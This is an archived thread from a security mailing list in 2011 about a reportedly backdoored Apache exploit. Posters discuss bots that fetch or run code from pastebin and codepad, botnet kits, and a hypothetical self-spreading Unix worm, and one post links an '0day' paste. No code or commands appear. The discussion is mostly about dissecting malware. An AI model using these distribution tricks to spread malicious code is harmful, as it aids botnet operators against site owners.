Full Disclosure mailing list archives

Re: Apache 2.2.17 exploit?

From: Darren Martyn <d.martyn.fulldisclosure () gmail com>
Date: Tue, 4 Oct 2011 10:43:25 +0100

Adam, thanks for the tip on Codepad, I am very grateful.

Is there actually a non backdoored variant of said code? I have not seen any
CVE mentioning that exploit so I was naturally wondering.

Also, pastebin/pastee based bots (those scanner kits especially) are not too
uncommon, I have found more than a few.

I was working on dissecting "kanbe.tar.gz" from madirish.net when my
hardware "vanished", very interesting kit. I have a special place in my
heart for those things, because one can easily find the botnets owners and
report to their ISP (or whatever) or simply observe it (see how big it is).
During the time after Kingcopes EXIM remote root exploit was released I saw
a few kits appear, the first a energymech mod with a scanner and "spreading"
exploit, another a self contained Perl script that spread itself ala worm.
Within the following months more of the kits appeared, including the ones
that have various "x" and "x2" shell scripts that simply pass args and such
to other scripts - fuck ugly things!

I wonder though, when someone will write some kind of "serious" worm for
*nix servers, some kind of self propegating, multiple spread/infection
method worm, that infects, roots, and iFrames the whole site with malware
spreading nastiness, along with whatever else the evil f*ckers want "roots"
for. Something like Scalper except a bit nastier. Will be a fun day for
malware dissection :)

On Tue, Oct 4, 2011 at 12:22 AM, xD 0x41 <secn3t () gmail com> wrote:

here are places like codepad.org that let you compile/execute various


Indeed, i have seen the codepad.org execute action used on many many bots,
even opastebin just using download= and, renaming the downloaded file :s not
to hard, dfont even need to rename file, and, raw= featuires, is plain code
just in a txt.
on codepad tho, you can actually execute the code on the server, and, thats
awesome for debugging i guess but, i prefer to use my own stdinout.
anyhow, it is a nice world there, that is where half the bots in use sit...
you should find some of the more popular botz, and strings, and watch
howmany are active...many would be, believ it. specially on pastebin and
codepad , those two are best because allow sraw download.. but, codepad,
even allows you to setup a subdomain wich was removed from the pastebin ,
unf..
ohwell, thats how it is, it is ok by me.
xd



On 4 October 2011 07:14, adam <adam () papsy net> wrote:

Darren,

There are places like codepad.org that let you compile/execute various
programming/scripting languages, of course you don't have the control/access
that you'd normally have but for some things - it may just be enough.

On Mon, Oct 3, 2011 at 11:41 AM, Darren Martyn <
d.martyn.fulldisclosure () gmail com> wrote:

I may have to set up such an RSS + REGEX along with a google alerts to
get the best of both :)

Since my lack of computing facilities has gotten worse in the last month
I have actually begun to forget ASM, so decoding shellcode is not so easy
for me :(
Nor do I have (currently) access to a Linux box to test it on - only a
friends W7 laptop (which wants to use Cyrillic) and the college computers
(W7 also... Network booting with Novell, buggy and slow for the win!)

I will keep on posting anything that looks even mildly interesting, may
find something fun in my travels :)


On Mon, Oct 3, 2011 at 5:05 PM, PsychoBilly <zpamh0l3 () gmail com> wrote:

OMG!
This ...
actually WORKS!
GR8 Job, m8+!
L33+ cC l33+
W00+ FB Bwana!
...
<! connection reseted by peer >

[[   adam   ]] @ [[   03/10/2011 17:56
]]--------------------------------------------------

Also, make sure you guys don't miss out on this 0day either:

http://pastebin.com/R8XdsUgK


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

Re: Apache 2.2.17 exploit?, (continued)
- - Re: Apache 2.2.17 exploit? Laurelai (Oct 03)
    - Re: Apache 2.2.17 exploit? Dan Dart (Oct 03)
    - Re: Apache 2.2.17 exploit? dave bl (Oct 03)
    - Re: Apache 2.2.17 exploit? Sergito (Oct 03)
    - Re: Apache 2.2.17 exploit? Dan Dart (Oct 03)
    - Re: Apache 2.2.17 exploit? adam (Oct 03)
    - Re: Apache 2.2.17 exploit? PsychoBilly (Oct 03)
    - Re: Apache 2.2.17 exploit? Darren Martyn (Oct 03)
    - Re: Apache 2.2.17 exploit? adam (Oct 03)
    - Re: Apache 2.2.17 exploit? xD 0x41 (Oct 04)
    - Re: Apache 2.2.17 exploit? Darren Martyn (Oct 04)
    - Re: Apache 2.2.17 exploit? halfdog (Oct 04)
    - Re: Apache 2.2.17 exploit? xD 0x41 (Oct 04)
    - Re: Apache 2.2.17 exploit? Kai (Oct 04)
    - Re: Apache 2.2.17 exploit? Andrew Farmer (Oct 04)
    - Re: Apache 2.2.17 exploit? xD 0x41 (Oct 04)
    - Re: Apache 2.2.17 exploit? Valdis . Kletnieks (Oct 04)
    - Re: Apache 2.2.17 exploit? xD 0x41 (Oct 04)
    - Re: Apache 2.2.17 exploit? xD 0x41 (Oct 04)
    - Re: Apache 2.2.17 exploit? halfdog (Oct 04)
    - Re: Apache 2.2.17 exploit? halfdog (Oct 04)

(Thread continues...)